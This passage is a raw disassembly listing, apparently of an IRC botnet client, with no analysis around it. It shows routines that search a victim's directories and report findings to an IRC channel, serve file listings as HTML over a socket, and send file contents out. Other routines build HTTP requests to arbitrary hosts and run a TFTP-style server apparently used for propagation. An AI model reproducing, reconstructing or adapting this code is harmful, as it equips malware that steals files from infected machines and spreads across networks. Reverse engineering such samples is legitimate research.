jmp short loc_4062B0
; ---------------------------------------------------------------------------
loc_4062C2: ; CODE XREF: sub_406047+267�j
push ebx
call dword_441450 ; closesocket
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_8C4]
push offset unk_428520
push eax
call sub_4173AC
lea eax, [ebp+var_8C4]
push eax
call sub_40C4F7
add esp, 10h
loc_4062F0: ; CODE XREF: sub_406047+1AD�j
; sub_406047+26F�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406047 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062F7 proc near ; CODE XREF: sub_405EC5+159�p
; sub_40F6F1+4C54�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_417430
mov edi, [ebp+arg_0]
push offset asc_4285AC ; "\n"
push edi
call sub_41824D
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_406356
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41792A
add esp, 14h
jmp loc_406453
; ---------------------------------------------------------------------------
loc_406356: ; CODE XREF: sub_4062F7+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_406439
call sub_417AF0
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
push edi
call sub_417AF0
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 0Ch
jmp short loc_406453
; ---------------------------------------------------------------------------
loc_406439: ; CODE XREF: sub_4062F7+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 10h
loc_406453: ; CODE XREF: sub_4062F7+5A�j
; sub_4062F7+140�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
cmp [ebp+arg_C], ebx
jz short loc_4064EB
push [ebp+arg_C]
call sub_417AF0
cmp eax, 2
pop ecx
jbe short loc_4064EB
push [ebp+arg_C]
call sub_417AF0
sub eax, 3
pop ecx
jz short loc_40649F
loc_406493: ; CODE XREF: sub_4062F7+1A6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40649F
dec eax
jnz short loc_406493
loc_40649F: ; CODE XREF: sub_4062F7+19A�j
; sub_4062F7+1A3�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_4182F0
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
loc_4064EB: ; CODE XREF: sub_4062F7+17E�j
; sub_4062F7+18C�j
lea eax, [ebp+var_388]
push eax
push edi
nop
call near ptr 7C8137D9h
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
nop
call near ptr 7C834EB1h
test eax, eax
jz loc_4068DC
mov edi, 1FFh
loc_406517: ; CODE XREF: sub_4062F7+5DF�j
cmp [ebp+var_388], ebx
jz loc_4068C4
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4068C4
lea eax, [ebp+var_35C]
push offset a_ ; "."
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4068C4
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
nop
call near ptr 7C80E866h
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
nop
call near ptr 7C80E7ECh
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_40658C
mov ecx, offset aAm ; "AM"
loc_40658C: ; CODE XREF: sub_4062F7+28E�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_406598
sub eax, 0Ch
loc_406598: ; CODE XREF: sub_4062F7+29C�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_4173AC
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_406745
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_406619
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41792A
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_41792A
add esp, 28h
jmp loc_406895
; ---------------------------------------------------------------------------
loc_406619: ; CODE XREF: sub_4062F7+2DB�j
cmp [ebp+arg_C], ebx
jz loc_406703
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS ; "%s%s/"
push edi
push eax
call sub_41792A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
lea eax, [ebp+var_35C]
push eax
call sub_417AF0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_4066B9
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4066BE
; ---------------------------------------------------------------------------
loc_4066B9: ; CODE XREF: sub_4062F7+3B9�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4066BE: ; CODE XREF: sub_4062F7+3C0�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_406886
; ---------------------------------------------------------------------------
loc_406703: ; CODE XREF: sub_4062F7+325�j
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41792A
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_406730: ; CODE XREF: sub_4062F7+476�j
lea eax, [ebp+var_248]
push esi
push eax
call sub_41792A
add esp, 24h
jmp loc_406895
; ---------------------------------------------------------------------------
loc_406745: ; CODE XREF: sub_4062F7+2CF�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_40676F
push ebx
push [ebp+var_368]
call sub_40D5BA
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_406730
; ---------------------------------------------------------------------------
loc_40676F: ; CODE XREF: sub_4062F7+454�j
cmp [ebp+arg_C], ebx
jz loc_40686F
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_2 ; "%s%s"
push edi
push eax
call sub_41792A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
lea eax, [ebp+var_35C]
push eax
call sub_417AF0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_40680F
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_406814
; ---------------------------------------------------------------------------
loc_40680F: ; CODE XREF: sub_4062F7+50F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_406814: ; CODE XREF: sub_4062F7+516�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_248]
push edi
push eax
call sub_41792A
add esp, 1Ch
jmp short loc_406895
; ---------------------------------------------------------------------------
loc_40686F: ; CODE XREF: sub_4062F7+47B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_406886: ; CODE XREF: sub_4062F7+407�j
lea eax, [ebp+var_248]
push eax
call sub_41792A
add esp, 18h
loc_406895: ; CODE XREF: sub_4062F7+31D�j
; sub_4062F7+449�j ...
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
cmp [ebp+arg_8], ebx
jz short loc_4068C4
push 7D0h
nop
call near ptr 7C802442h
loc_4068C4: ; CODE XREF: sub_4062F7+226�j
; sub_4062F7+241�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
nop
call near ptr 7C834EB1h
test eax, eax
jnz loc_406517
loc_4068DC: ; CODE XREF: sub_4062F7+215�j
push [ebp+arg_0]
nop
call near ptr 7C80EDD7h
cmp [ebp+arg_8], ebx
jz short loc_40691F
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40D5BA
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40D5BA
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_4173AC
add esp, 14h
jmp short loc_406953
; ---------------------------------------------------------------------------
loc_40691F: ; CODE XREF: sub_4062F7+5F1�j
cmp [ebp+arg_C], ebx
jz short loc_406939
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_4173AC
pop ecx
pop ecx
jmp short loc_406953
; ---------------------------------------------------------------------------
loc_406939: ; CODE XREF: sub_4062F7+62B�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_4173AC
add esp, 10h
loc_406953: ; CODE XREF: sub_4062F7+626�j
; sub_4062F7+640�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_441408 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4062F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406979 proc near ; CODE XREF: sub_405EC5+13B�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
nop
call near ptr 7C801A24h
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_406A31
push esi
push ebx
nop
call near ptr 7C810A77h
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_406A2A
loc_4069BE: ; CODE XREF: sub_406979+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_417430
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_4069DB
mov edi, [ebp+arg_4]
loc_4069DB: ; CODE XREF: sub_406979+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
nop
call near ptr 7C810B8Eh
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
nop
call near ptr 7C80180Eh
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_406A25
call dword_44134C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_406A2A
xor eax, eax
loc_406A25: ; CODE XREF: sub_406979+9B�j
sub [ebp+arg_4], eax
jnz short loc_4069BE
loc_406A2A: ; CODE XREF: sub_406979+43�j
; sub_406979+A8�j
push ebx
nop
call near ptr 7C809B47h
loc_406A31: ; CODE XREF: sub_406979+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_406979 endp
; =============== S U B R O U T I N E =======================================
sub_406A36 proc near ; CODE XREF: sub_406047+17C�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_417AF0
test eax, eax
pop ecx
jbe short loc_406A5F
loc_406A49: ; CODE XREF: sub_406A36+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_406A53
mov byte ptr [esi+edi], 2Fh
loc_406A53: ; CODE XREF: sub_406A36+17�j
push edi
inc esi
call sub_417AF0
cmp esi, eax
pop ecx
jb short loc_406A49
loc_406A5F: ; CODE XREF: sub_406A36+11�j
mov eax, edi
pop edi
pop esi
retn
sub_406A36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A64 proc near ; CODE XREF: sub_40F6F1+2CE7�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_441330 ; WSAStartup
push 6
push 1
push 2
call dword_441438 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call dword_4413B8 ; ntohs
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40AE95
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_406B41
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_406ADD
mov eax, offset byte_43C63C
loc_406ADD: ; CODE XREF: sub_406A64+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41792A
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call dword_441408 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_417490
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call dword_4413D0 ; recv
pop esi
loc_406B41: ; CODE XREF: sub_406A64+6B�j
push ebx
call dword_441450 ; closesocket
call dword_441318 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_4173AC
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_406B81
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_406B81: ; CODE XREF: sub_406A64+102�j
pop edi
pop ebx
leave
retn
sub_406A64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B85 proc near ; CODE XREF: sub_406B85:loc_407070�p
; DATA XREF: sub_4071BD+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call dword_441438 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_406C48
push 190h
nop
call near ptr 7C802442h
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset unk_428B80
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_406C28
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40DC10
add esp, 14h
loc_406C28: ; CODE XREF: sub_406B85+7E�j
lea eax, [ebp+var_780]
push eax
call sub_40C4F7
push [ebp+var_170]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_406C48: ; CODE XREF: sub_406B85+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov dword_446E1C[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call dword_4413B8 ; ntohs
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call dword_4413E4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_406CAD
push 1388h
nop
call near ptr 7C802442h
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_407070
; ---------------------------------------------------------------------------
loc_406CAD: ; CODE XREF: sub_406B85+10D�j
lea eax, [ebp+var_378]
push offset aRb ; "rb"
push eax
call sub_41823A
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_406D2B
push 190h
nop
call near ptr 7C802442h
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset unk_428B4C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40DC10
lea eax, [ebp+var_780]
push eax
call sub_40C4F7
push [ebp+var_170]
call sub_417174
add esp, 28h
push ebx
nop
call near ptr 7C80C058h
loc_406D2B: ; CODE XREF: sub_406B85+140�j
mov esi, 200h
loc_406D30: ; CODE XREF: sub_406B85+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_407030
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call dword_4413A0 ; select
test eax, eax
jle loc_407024
mov al, byte_43C63C
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call dword_441390 ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_4173AC
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_40700E
cmp [ebp+var_D7], 1
jnz loc_406F5A
lea eax, [ebp+var_274]
push eax
call sub_417AF0
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_417AF0
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_418480
add esp, 14h
test eax, eax
jnz loc_406F14
lea eax, [ebp+var_1C]
push eax
call sub_417AF0
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_418480
add esp, 10h
test eax, eax
jnz loc_406F14
push ebx
push ebx
push [ebp+var_8]
call sub_4183EE
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_418132
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call dword_44141C ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_428B04
loc_406EC8: ; CODE XREF: sub_406B85+484�j
lea eax, [ebp+var_780]
push eax
call sub_4173AC
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_406F02
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40DC10
add esp, 14h
loc_406F02: ; CODE XREF: sub_406B85+358�j
lea eax, [ebp+var_780]
push eax
call sub_40C4F7
pop ecx
jmp loc_407024
; ---------------------------------------------------------------------------
loc_406F14: ; CODE XREF: sub_406B85+2B6�j
; sub_406B85+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_428AF0
push edi
call dword_44141C ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset unk_428ABC
push eax
call sub_4173AC
lea eax, [ebp+var_D8]
push eax
call sub_40C4F7
add esp, 14h
jmp loc_407024
; ---------------------------------------------------------------------------
loc_406F5A: ; CODE XREF: sub_406B85+275�j
cmp [ebp+var_D7], 4
jnz loc_40700E
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_406F97
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_406FA5
; ---------------------------------------------------------------------------
loc_406F97: ; CODE XREF: sub_406B85+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_406FA5: ; CODE XREF: sub_406B85+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_4183EE
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_418132
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call dword_44141C ; sendto
cmp edi, ebx
jnz short loc_407024
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_428A68
jmp loc_406EC8
; ---------------------------------------------------------------------------
loc_40700E: ; CODE XREF: sub_406B85+268�j
; sub_406B85+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_428A5C
push edi
call dword_44141C ; sendto
loc_407024: ; CODE XREF: sub_406B85+204�j
; sub_406B85+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_406D30
loc_407030: ; CODE XREF: sub_406B85+1B4�j
push edi
call dword_441450 ; closesocket
push [ebp+var_8]
call sub_4180DC
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_407064
push [ebp+var_170]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_407064: ; CODE XREF: sub_406B85+4CA�j
push 3E8h
nop
call near ptr 7C802442h
push esi
loc_407070: ; CODE XREF: sub_406B85+123�j
call sub_406B85
pop edi
pop esi
pop ebx
leave
retn 4
sub_406B85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40707C proc near ; CODE XREF: sub_40F6F1+5E77�p
; DATA XREF: ___:004257D0�o ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_4290B8
push eax
xor ebx, ebx
call sub_4173AC
cmp dword_428BF8, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_4070EA
push esi
mov esi, offset dword_428C00
loc_4070AF: ; CODE XREF: sub_40707C+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_4173AC
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_4184C0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_4070AF
pop esi
loc_4070EA: ; CODE XREF: sub_40707C+2B�j
push dword_5154C0
call sub_40BBF6
push eax
push ebx
lea eax, [ebp+var_400]
